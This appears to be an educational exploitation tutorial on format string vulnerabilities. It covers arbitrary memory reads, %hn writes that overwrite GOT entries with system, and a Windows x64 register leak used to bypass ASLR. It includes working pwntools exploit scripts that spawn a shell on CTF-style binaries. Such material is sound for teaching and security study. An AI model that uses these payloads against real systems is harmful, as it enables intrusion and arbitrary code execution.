Format Strings

Notice that the attacker controls the printf parameter, which means that their input will be on the stack when printf is called, so they can place specific memory addresses on the stack.

caution

An attacker controlling this input can place arbitrary addresses on the stack and make printf access them. The next sections explain how to use this behavior.

Arbitrary Read

The formatter %n$s makes printf take the address located at the n-th position, follow it, and print it as if it were a string (printing until a 0x00 is found). So if the base address of the binary is 0x8048000, and we know that the user input starts at the 4th position on the stack, it's possible to print the start of the binary with:

python

from pwn import *

p = process('./bin')

payload = b'%6$s' # 4th param: the format string itself
payload += b'xxxx' # 5th param (padding so the format part fills 8 bytes)
payload += p32(0x8048000) # 6th param: the address to read

p.sendline(payload)
log.info(p.clean()) # b'\x7fELF\x01\x01\x01||||'

caution

Note that you cannot put the address 0x8048000 at the start of the input, because the string would be truncated at the 0x00 byte contained in that address.
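The truncation is easy to see by packing the address by hand. The following is a minimal sketch using only the standard library (`struct.pack` stands in for pwntools' `p32`, and the helper name `first_null` is hypothetical):

```python
import struct

# Little-endian 32-bit packing, equivalent to pwntools' p32()
addr = struct.pack("<I", 0x8048000)
print(addr)  # b'\x00\x80\x04\x08'

def first_null(payload: bytes) -> int:
    """Return the index of the first 0x00 byte, or -1 if there is none."""
    return payload.find(b"\x00")

# Address first: the format string ends at byte 0, so "%4$s" is never parsed
addr_first = addr + b"%4$s"
# Format first: the whole specifier is parsed before the null byte is reached
fmt_first = b"%6$sxxxx" + addr

print(first_null(addr_first))  # 0
print(first_null(fmt_first))   # 8
```

Placing the address after the specifier keeps the null byte behind everything printf needs to parse.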

Finding the offset

To find the offset to your input, send 4 or 8 bytes (0x41414141) followed by **%1$x** and increase the value until the A's come back.

Brute Force printf offset

python

# Code from https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak

from pwn import *

# Iterate over a range of integers
# Iterate over candidate offsets (positional arguments start at 1)
for i in range(1, 10):
    # Construct a payload that includes the current integer as offset
    payload = f"AAAA%{i}$x".encode()

    # Start a new process of the "chall" binary
    p = process("./chall")

    # Send the payload to the process
    p.sendline(payload)

    # Read and store the output of the process
    output = p.clean()

    # Close the process
    p.close()

    # Check if the string "41414141" (hexadecimal representation of "AAAA") is in the output
    if b"41414141" in output:
        # If the string is found, log the success message and break out of the loop
        log.success(f"User input is at offset : {i}")
        break
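When the binary echoes enough output, the offset can often be found in a single run by chaining several %p conversions and parsing the result. This is a rough sketch, not part of the original code: the helper name `find_offset`, the "." separator and the sample output are all assumptions made for illustration.

```python
from typing import Optional

def find_offset(leak: bytes, marker: bytes = b"AAAA", sep: bytes = b".") -> Optional[int]:
    """Return the 1-based position whose leaked value equals the marker bytes."""
    # The marker is read back from memory as a little-endian integer
    wanted = int.from_bytes(marker, "little")
    # Drop the echoed marker, then walk the separated hex values
    values = leak[len(marker):].split(sep)
    for position, value in enumerate(values, start=1):
        try:
            if int(value, 16) == wanted:
                return position
        except ValueError:
            continue  # e.g. "(nil)" or trailing garbage
    return None

# Payload to send: the marker followed by a chain of %p conversions
payload = b"AAAA" + b".".join([b"%p"] * 10)

# Made-up sample output, for illustration only
sample = b"AAAA0xffffd0a0.0x40.(nil).0x41414141.0x252e7025"
print(find_offset(sample))  # 4
```

On a 64-bit target the same idea applies with an 8-byte marker such as b"AAAAAAAA".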

How useful

Arbitrary reads can be useful to:

Dump the binary from memory
Access specific parts of memory where sensitive info is stored (like canaries, encryption keys or custom passwords like in this CTF challenge)
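To read several addresses in a row, the payload from the Arbitrary Read section can be wrapped in a small helper. This is a sketch for 32-bit targets only; the name `build_read_payload` and its parameters are hypothetical, and `struct.pack` is used in place of pwntools' `p32` so the block runs on its own.

```python
import struct

def build_read_payload(addr: int, input_offset: int, fmt_len: int = 8) -> bytes:
    """Build a 32-bit '%N$s' payload that reads the string stored at addr."""
    if fmt_len % 4:
        raise ValueError("fmt_len must be a multiple of 4")
    # The address sits fmt_len bytes into the input, i.e. fmt_len // 4 slots later
    index = input_offset + fmt_len // 4
    spec = f"%{index}$s".encode()
    if len(spec) > fmt_len:
        raise ValueError("fmt_len too small for this specifier")
    # Pad the specifier so the address is aligned on a stack slot
    return spec.ljust(fmt_len, b"x") + struct.pack("<I", addr)

print(build_read_payload(0x8048000, 4))  # b'%6$sxxxx\x00\x80\x04\x08'
```

Each read stops at the first 0x00 in the target memory, so dumping a region means repeating the request and advancing past the bytes already returned.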

Arbitrary Write

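The formatter **%<num>$n** writes the number of bytes printed so far to the address pointed to by the <num>-th parameter on the stack. If an attacker can make printf output as many chars as they want, they can use **%<num>$n** to write an arbitrary number to an arbitrary address.

Fortunately, writing the number 9999 does not require adding 9999 "A"s to the input. Instead, the formatter **%.<num-write>d%<num>$n** can be used to write the number <num-write> to the address pointed to by position num.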

bash

AAAA%.6000d%4\$n -> Write 6004 to the address indicated by the 4th param
AAAA.%500\$08x -> Param at offset 500
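The value 6004 in the first line is the 4 literal "A" characters plus the 6000 characters produced by the padded conversion. Python's printf-style formatting pads integers the same way for "%.Nd", so the count can be checked locally (a quick illustration, not an exploit):

```python
# "%.6000d" forces at least 6000 digits, zero-padded
printed = "AAAA" + "%.6000d" % 1

# %n would store the number of characters produced so far
print(len(printed))  # 6004
```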

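However, to write an address such as 0x08049724 (a huge number to write in one go), $hn is usually used instead of $n. This writes only 2 bytes, so the operation is done twice: once for the higher 2 bytes of the address and once for the lower 2 bytes.

Therefore, this vulnerability allows writing anything to any address (arbitrary write).

In this example, the goal is to overwrite the address of a function in the GOT table that will be called later. Other arbitrary-write-to-exec techniques could be abused as well: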

Write What Where 2 Exec

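We are going to overwrite a function that receives its arguments from the user and point it to the system function.
As mentioned, writing the address usually takes 2 steps: first write 2 bytes of the address, then the other 2. To do so, **$hn** is used.

HOB refers to the 2 higher bytes of the address
LOB refers to the 2 lower bytes of the address

Then, because of how format strings work (the count of printed characters can only grow), you need to write the smaller of [HOB, LOB] first and then the other one.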
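The split and the write order can be sketched in a few lines. The function name `plan_hn_writes` is hypothetical; the target 0x08049724 is the address used in this section, and 0xbffffc2f is an example value to write there.

```python
def plan_hn_writes(target: int, value: int):
    """Return [(destination, half_value), ...] with the smaller half first."""
    hob = (value >> 16) & 0xFFFF   # high-order 2 bytes, stored at target + 2
    lob = value & 0xFFFF           # low-order 2 bytes, stored at target
    writes = [(target + 2, hob), (target, lob)]
    # The printed-character counter only grows, so write in increasing order
    return sorted(writes, key=lambda w: w[1])

for dest, half in plan_hn_writes(0x08049724, 0xBFFFFC2F):
    print(hex(dest), hex(half))
# 0x8049726 0xbfff
# 0x8049724 0xfc2f
```

Because the target is little-endian, the high half lands at address + 2 and the low half at the address itself.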

If HOB < LOB
[address+2][address]%.[HOB-8]x%[offset]\$hn%.[LOB-HOB]x%[offset+1]\$hn

If HOB > LOB
[address+2][address]%.[LOB-8]x%[offset+1]\$hn%.[HOB-LOB]x%[offset]\$hn

Payload fields, in order: HOB address, LOB address, HOB_shellcode-8, parameter number of the HOB address, LOB_shell-HOB_shell, parameter number of the LOB address

bash

python3 -c 'import sys; sys.stdout.buffer.write(b"\x26\x97\x04\x08" + b"\x24\x97\x04\x08" + b"%.49143x" + b"%4$hn" + b"%.15408x" + b"%5$hn" + b"\n")'
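The two cases can be folded into one helper that picks the order automatically. This is a minimal sketch for 32-bit targets that follows the layout described in this section; the name `build_hn_payload` is hypothetical, and the size check is an added assumption (a "%.Nx" conversion is only guaranteed to print exactly N characters when N is at least 8).

```python
import struct

def build_hn_payload(target: int, value: int, offset: int) -> bytes:
    """Build a 32-bit payload that writes value to target with two %hn writes."""
    hob, lob = (value >> 16) & 0xFFFF, value & 0xFFFF
    # [address+2][address] occupy parameters offset and offset+1
    payload = struct.pack("<I", target + 2) + struct.pack("<I", target)
    # (half value, parameter index), smaller half first
    first, second = sorted([(hob, offset), (lob, offset + 1)])
    pad1 = first[0] - len(payload)   # the 8 address bytes are already printed
    pad2 = second[0] - first[0]
    # "%.Nx" prints exactly N characters only when N >= 8 hex digits
    if pad1 < 8 or pad2 < 8:
        raise ValueError("halves too small or too close for this layout")
    payload += f"%.{pad1}x%{first[1]}$hn".encode()
    payload += f"%.{pad2}x%{second[1]}$hn".encode()
    return payload

print(build_hn_payload(0x08049724, 0xBFFFFC2F, 4))
```

With target 0x08049724, value 0xbffffc2f and offset 4, this yields the same bytes as the one-line command above.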

Pwntools Template

You can find a template to prepare an exploit for this kind of vulnerability in:

Format Strings Template

Or this basic example from here:

python

from pwn import *

elf = context.binary = ELF('./got_overwrite-32')
libc = elf.libc
libc.address = 0xf7dc2000       # ASLR disabled

p = process()

payload = fmtstr_payload(5, {elf.got['printf'] : libc.sym['system']})
p.sendline(payload)

p.clean()

p.sendline(b'/bin/sh')

p.interactive()

Format Strings to BOF

It's possible to abuse the write actions of a format string vulnerability to write to addresses on the stack and exploit a buffer overflow type of vulnerability.

Windows x64: Format-string leak to bypass ASLR (no varargs)

On Windows x64 the first four integer/pointer parameters are passed in registers: RCX, RDX, R8, R9. In many buggy call sites the attacker-controlled string is used as the format argument but no variadic arguments are provided, for example:

// keyData is fully controlled by the client
// _snprintf(dst, len, fmt, ...)
_snprintf(keyStringBuffer, 0xff2, (char*)keyData);

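Because no varargs are passed, any conversion such as "%p", "%x" or "%s" makes the CRT read the next variadic argument from the appropriate register. With the Microsoft x64 calling convention, the first such read for "%p" comes from R9. Whatever transient value is in R9 at the call site gets printed. In practice this often leaks a stable in-module pointer (e.g., a pointer to a local/global object previously placed in R9 by surrounding code, or a callee-saved value), which can be used to recover the module base and defeat ASLR.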

Practical workflow:

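Inject a harmless format such as "%p " at the very start of the attacker-controlled string so the first conversion executes before any filtering.
Capture the leaked pointer, identify the static offset of that object inside the module (by reversing once with symbols or a local copy), and recover the image base as leak - known_offset.
Reuse that base to compute absolute addresses for ROP gadgets and IAT entries remotely.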

Example (abbreviated python):

python

from pwn import remote

# Send an input that the vulnerable code will pass as the "format"
fmt = b"%p " + b"-AAAAA-BBB-CCCC-0252-"  # leading %p leaks R9
io = remote(HOST, 4141)
# ... drive protocol to reach the vulnerable snprintf ...
leaked = int(io.recvline().split()[2], 16)   # e.g. 0x7ff6693d0660
base   = leaked - 0x20660                     # module base = leak - offset
print(hex(leaked), hex(base))
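The last workflow step, turning the recovered base into absolute addresses, can be sketched as follows. The helper names and the gadget RVA 0x1234 are made up for illustration; the alignment check relies on PE image bases being multiples of 64 KiB.

```python
ALLOC_GRANULARITY = 0x10000  # PE image bases are multiples of 64 KiB

def module_base(leak: int, known_offset: int) -> int:
    """Recover the image base from a leaked in-module pointer."""
    base = leak - known_offset
    # A misaligned result usually means a wrong offset or a non-module pointer
    if base % ALLOC_GRANULARITY:
        raise ValueError(f"suspicious base {base:#x}")
    return base

def rebase(base: int, rva: int) -> int:
    """Turn a relative virtual address into an absolute one."""
    return base + rva

base = module_base(0x7FF6693D0660, 0x20660)
print(hex(base))                  # 0x7ff6693b0000
# 0x1234 is a made-up gadget RVA, for illustration only
print(hex(rebase(base, 0x1234)))  # 0x7ff6693b1234
```

Failing early on a misaligned base is a cheap sanity check before any ROP chain is built on top of it.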

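Notes:

The exact offset to subtract is found once during local reversing and then reused (same binary/version).
If "%p" doesn't print a valid pointer on the first try, try other specifiers ("%llx", "%s") or multiple conversions ("%p %p %p") to sample other argument registers/stack.
This pattern is specific to the Windows x64 calling convention and to printf-family implementations that fetch nonexistent varargs from registers when the format string requests them.

This technique is extremely useful to bootstrap ROP on Windows services compiled with ASLR and no obvious memory disclosure primitives.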

Other Examples & References

https://ir0nstone.gitbook.io/notes/types/stack/format-string
https://www.youtube.com/watch?v=t1LH9D5cuK4
https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak
https://guyinatuxedo.github.io/10-fmt_strings/pico18_echo/index.html
32 bit, no relro, no canary, nx, no pie, basic use of format strings to leak the flag from the stack (no need to alter the execution flow)
https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html
32 bit, relro, no canary, nx, no pie, format string to overwrite the address of fflush with the win function (ret2win)
https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html
32 bit, relro, no canary, nx, no pie, format string to write an address inside main into .fini_array (so the flow loops back one more time) and overwrite strlen in the GOT table with system. When the flow returns to main, strlen is executed with the user input and, since it now points to system, the passed command is executed.
